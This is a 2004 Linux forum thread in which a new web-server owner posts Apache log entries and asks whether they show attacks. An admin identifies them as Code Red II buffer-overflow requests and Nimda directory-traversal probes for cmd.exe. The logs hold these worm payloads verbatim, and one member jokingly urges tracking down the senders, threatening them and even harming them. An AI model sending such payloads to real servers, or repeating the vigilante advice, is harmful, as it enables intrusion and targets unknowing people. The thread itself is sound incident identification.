Linux Help
guides forums blogs
Home Desktops Distributions ISO Images Logos Newbies Reviews Software Support & Resources Linuxhelp Wiki

Welcome Guest ( Log In | Register )



Advanced DNS Management
New ZoneEdit. New Managment.

FREE DNS Is Back

Sign Up Now
 
Reply to this topicStart new topic
> Is This An Attack?
StevenMig
post Mar 18 2004, 04:56 PM
Post #1


Whats this Lie-nix Thing?
*

Group: Members
Posts: 8
Joined: 29-February 04
Member No.: 2,497



I am not 100% sure if this is the place to ask, but the securitry forum seemed to only post exploits. Anyway, I set up a web server, just to test it out.
I haven't had my computer on too much,
Only two days, and not even full ones, but I found some interesting log entries
CODE
68.20.213.67 - - [17/Mar/2004:17:58:06 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%
u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 405 "-" "-"

68.50.47.131 - - [17/Mar/2004:19:39:41 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 410 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:41 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 408 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:41 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 418 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:41 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 418 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:41 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 432 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:42 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 449 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:42 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 449 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:42 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 465 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:42 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 431 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:42 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 431 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:43 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 431 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:43 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 431 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:43 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 422 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:43 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 422 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:43 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 432 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:44 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 432 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:30 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 410 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:31 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 408 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:31 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 418 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:32 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 418 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:32 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 432 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:32 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 449 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:33 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 449 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:33 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../
winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 465 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:33 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 431 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:34 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 431 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:34 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 431 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:35 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 431 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:35 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 422 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:35 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 422 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:36 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 432 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:36 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 432 "-" "-"

I don't care about the people or tracking them down, but one of my goals for running a server is to
help me learn about computer security, so I am wondering if I identified this correctly as an attack.
The first one looks like a buffer overflow, and the rest look like a canned program looking for vulnerable
scripts or trying to open a command prompt (obviously the attacker or program didn't do any checking
considering most of the request are for a windows server.
Go to the top of the page
 
+Quote Post
hughesjr
post Mar 18 2004, 06:09 PM
Post #2


Its GNU/Linuxhelp.net
*******

Group: Admin
Posts: 3,433
Joined: 25-July 03
From: Corpus Chrsiti, TX, USA
Member No.: 1,151



The one with all the xxxxxxxxxxxxxxxx's is an infected code red II server trying to infect your server.


The Ones with the .exe files is NIMDA.

If you were running an IIS server that is unpatched, then it would now be infected....


--------------------
Johnny Hughes
hughesjr@linuxhelp.net
Enterprise Alternatives: CentOS, WhiteBoxEL
Favorite Workstation Distros (in order): CentOS, Gentoo, Debian Sarge, Ubuntu, Mandrake, FedoraCore, Slackware, SUSE
Favorite Server Distros (in order): CentOS, WhiteBoxEL, Debian Sarge, Slackware, Mandrake, FedoraCore, Gentoo, SUSE
Go to the top of the page
 
+Quote Post
Termina
post Mar 18 2004, 06:18 PM
Post #3


RMS is my Hero
******

Group: Support Specialist
Posts: 862
Joined: 18-February 04
From: Wisconsin
Member No.: 2,404



QUOTE
don't care about the people or tracking them down


Screw that, track down the bastards and make them pay. If not legally, then get the home address, and... *coughs*

*darts eyes around, and hands him a hachet*


--------------------
*Points finger at the author above him* They're a witch! Burn them!
---
Vist my website!
Join me in IRC! Server: st0rage.org Channel: #UnhandledExceptions
Go to the top of the page
 
+Quote Post
Robert83
post Mar 18 2004, 06:20 PM
Post #4


Its GNU/Linuxhelp.net
*******

Group: Support Specialist
Posts: 1,439
Joined: 3-January 04
From: Germany
Member No.: 2,069



yeah smile.gif)

give her/him a zergling rush smile.gif smile.gif smile.gif


Sincerely
Robert B


--------------------
Robert Becskei
robert83@linuxhelp.net
--------------------
May the source be with us!
--------------------
AMD X2-3800 @ 2400Mhz
2048MB DDR 400Mhz
DFI Lanparty UT4 NF4 ULTRA-D
GeForce 7800GT
250GB+250GB
Pioneer DVD-RW
17inch Samsung Syncmaster 757NF
WinXP Pro (SP2)/ CentOS 4.3
--------------------
Go to the top of the page
 
+Quote Post
StevenMig
post Mar 18 2004, 06:35 PM
Post #5


Whats this Lie-nix Thing?
*

Group: Members
Posts: 8
Joined: 29-February 04
Member No.: 2,497



Wow, less than day of uptime and this already. Anyway, should I really track them down?
Now I know I have to get my act together, If anything targeted me, I think I'd be pretty screwed. I haven't changed anything on my apache server.
Go to the top of the page
 
+Quote Post
Termina
post Mar 18 2004, 07:16 PM
Post #6


RMS is my Hero
******

Group: Support Specialist
Posts: 862
Joined: 18-February 04
From: Wisconsin
Member No.: 2,404



Yes, you really should.

Atleast scare them for awhile. If you let them think they can get away with this kind of shit, they'll just keep doing it. If you threaten them with a lawsuit (especially if they're under 18), they'll piss themselves


--------------------
*Points finger at the author above him* They're a witch! Burn them!
---
Vist my website!
Join me in IRC! Server: st0rage.org Channel: #UnhandledExceptions
Go to the top of the page
 
+Quote Post
hughesjr
post Mar 18 2004, 07:17 PM
Post #7


Its GNU/Linuxhelp.net
*******

Group: Admin
Posts: 3,433
Joined: 25-July 03
From: Corpus Chrsiti, TX, USA
Member No.: 1,151



There are thousands of NIMDA and CODE RED infected servers out there ... they aren't doing it on purpose. (It is a worm ... if your server is infected .. it automatically tries to infect other servers). So long as you are not running IIS, I would just not worry about it. If you are running IIS and you haven't patched ... get a good anti virus progam and scan your PC...


--------------------
Johnny Hughes
hughesjr@linuxhelp.net
Enterprise Alternatives: CentOS, WhiteBoxEL
Favorite Workstation Distros (in order): CentOS, Gentoo, Debian Sarge, Ubuntu, Mandrake, FedoraCore, Slackware, SUSE
Favorite Server Distros (in order): CentOS, WhiteBoxEL, Debian Sarge, Slackware, Mandrake, FedoraCore, Gentoo, SUSE
Go to the top of the page
 
+Quote Post
Termina
post Mar 18 2004, 07:24 PM
Post #8


RMS is my Hero
******

Group: Support Specialist
Posts: 862
Joined: 18-February 04
From: Wisconsin
Member No.: 2,404



Ah... *falls over*

Too bad. =/ I... hate... people who do that kind of stuff. >_<

*grumbles and mutters*

Robert: Do you play starcraft (currently?)? If so, want to face me sometime? (Havn't played in a few months, but would love a match sometime)


--------------------
*Points finger at the author above him* They're a witch! Burn them!
---
Vist my website!
Join me in IRC! Server: st0rage.org Channel: #UnhandledExceptions
Go to the top of the page
 
+Quote Post

Reply to this topicStart new topic
1 User(s) are reading this topic (1 Guests and 0 Anonymous Users)
0 Members:

 



RSS Lo-Fi Version Time is now: 11th December 2017 - 04:06 PM